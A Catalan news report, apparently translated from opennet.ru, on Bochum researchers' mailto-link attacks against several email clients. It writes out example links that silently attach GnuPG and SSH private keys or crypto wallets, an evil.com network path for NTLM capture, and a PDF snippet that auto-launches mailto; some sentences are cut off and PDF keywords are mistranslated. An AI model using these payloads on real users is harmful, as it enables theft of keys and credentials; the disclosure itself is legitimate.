Investigadors de la Universitat del Ruhr de Bochum (Alemanya)
Enllaços «
Els clients de correu Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) i Pegasus Mail eren vulnerables a un atac trivial que us permet adjuntar automàticament qualsevol fitxer local, especificat mitjançant un enllaç com "mailto:?attach=path_to_file". El fitxer s'adjunta sense mostrar cap avís, per la qual cosa, sense una atenció especial, l'usuari pot no notar que la carta s'enviarà amb un fitxer adjunt.
Per exemple, utilitzant un enllaç com "mailto:[protegit per correu electrònic]&subject=Títol&body=Text&attach=~/.gnupg/secring.gpg" podeu inserir claus privades de GnuPG a la carta. També podeu enviar el contingut de carteres cripto (~/.bitcoin/wallet.dat), claus SSH (~/.ssh/id_rsa) i qualsevol fitxer accessible per l'usuari. A més, Thunderbird us permet adjuntar grups de fitxers per màscara mitjançant construccions com "attach=/tmp/*.txt".
A més dels fitxers locals, alguns clients de correu electrònic processen enllaços a l'emmagatzematge de xarxa i camins al servidor IMAP. En particular, IBM Notes us permet transferir un fitxer des d'un directori de xarxa quan processeu enllaços com "attach=\\evil.com\dummyfile", així com interceptar paràmetres d'autenticació NTLM enviant un enllaç a un servidor SMB controlat per l'atacant. (la sol·licitud s'enviarà amb l'usuari actual dels paràmetres d'autenticació).
Thunderbird processa correctament peticions com "attach=imap:///fetch>UID>/INBOX>1/", que us permeten adjuntar contingut de carpetes del servidor IMAP. Al mateix temps, els missatges recuperats d'IMAP, xifrats mitjançant OpenPGP i S/MIME, són desxifrats automàticament pel client de correu abans d'enviar-los. Els desenvolupadors de Thunderbird van ser
Les versions antigues de Thunderbird també eren vulnerables a altres dues variants d'atac a PGP i S/MIME proposades pels investigadors. En concret, Thunderbird, així com OutLook, PostBox, eM Client, MailMate i R2Mail2, van ser objecte d'un atac de reemplaçament de claus, causat pel fet que el client de correu importa i instal·la automàticament nous certificats transmesos en missatges S/MIME, cosa que permet l'atacant per organitzar la substitució de claus públiques ja emmagatzemades per l'usuari.
El segon atac, al qual són susceptibles Thunderbird, PostBox i MailMate, manipula les característiques del mecanisme d'emmagatzematge automàtic dels esborranys i permet, mitjançant paràmetres de mailto, iniciar el desxifrat de missatges xifrats o l'addició d'una signatura digital per a missatges arbitraris, amb transmissió posterior del resultat al servidor IMAP de l'atacant. En aquest atac, el text xifrat es transmet a través del paràmetre "body" i l'etiqueta "meta refresh" s'utilitza per iniciar una trucada al servidor IMAP de l'atacant. Per exemple: ' '
Per processar automàticament els enllaços "mailto:" sense la interacció de l'usuari, es poden utilitzar documents PDF dissenyats especialment: l'acció OpenAction en PDF us permet iniciar automàticament el gestor de mailto quan obriu un document:
%PDF-1.5
1 obj
<< /Tipus /Catàleg /OpenAction [2 0 R] >>
endobj
2 obj
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj
Font: opennet.ru